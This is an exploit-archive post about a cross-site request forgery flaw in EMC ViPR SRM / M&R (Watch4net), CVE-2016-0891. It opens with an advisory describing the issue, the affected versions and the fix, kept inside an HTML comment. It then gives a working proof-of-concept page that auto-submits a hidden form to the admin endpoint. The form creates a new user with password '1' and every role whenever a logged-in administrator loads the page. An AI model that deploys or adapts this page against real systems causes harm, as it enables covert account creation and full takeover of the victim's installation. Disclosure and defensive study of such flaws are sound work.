EMC ViPR SRM - Cross-Site Request Forgery

<!--
EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection
 
Abstract
 
It was discovered that EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.
 
Affected versions
 
Versions of EMC ViPR SRM prior to version 3.7 are affected by these vulnerabilities.
 
See also
 
- ESA-2016-039
- CVE-2016-0891
 
Fix
 
EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please note that this fix is only available for registered EMC Online Support customers.
 
Introduction
 
EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard. EMC M&R is a core embedded software technology existing in EMC ViPR, ViPR SRM and Service Assurance Suite.
 
EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.
 
Details
 
Cross-Site Request Forgery (CSRF) is an attack, which forces an end user to execute unwanted actions on a web application to which the targeted user is currently authenticated. With a little help of social engineering an attacker may trick the users of a web application into executing actions (requests) of the attacker's choosing.
 
The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account.
-->
 
<html>
   <body>
      <form action="http://<target>:58080/APG/admin/form" method="POST">
         <input type="hidden" name="form&#45;id" value="UserForm" />
         <input type="hidden" name="ident" value="" />
         <input type="hidden" name="old" value="" />
         <input type="hidden" name="name" value="CSRF" />
         <input type="hidden" name="password" value="1" />
         <input type="hidden" name="confirm" value="1" />
         <input type="hidden" name="title" value="" />
         <input type="hidden" name="first&#45;name" value="Han" />
         <input type="hidden" name="last&#45;name" value="Sahin" />
         <input type="hidden" name="email" value="attacker&#64;example&#46;com" />
         <input type="hidden" name="role" value="user" />
         <input type="hidden" name="profile" value="0" />
         <input type="hidden" name="user&#45;roles" value="5" />
         <input type="hidden" name="user&#45;roles" value="1" />
         <input type="hidden" name="user&#45;roles" value="3" />
         <input type="hidden" name="user&#45;roles" value="4" />
         <input type="hidden" name="user&#45;roles" value="2" />
         <input type="hidden" name="user&#45;roles" value="6" />
         <input type="hidden" name="filter" value="" />
         <input type="hidden" name="custom" value="true" />
         <input type="submit" value="Submit request" />
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>

#  0day.today [2018-04-10]  #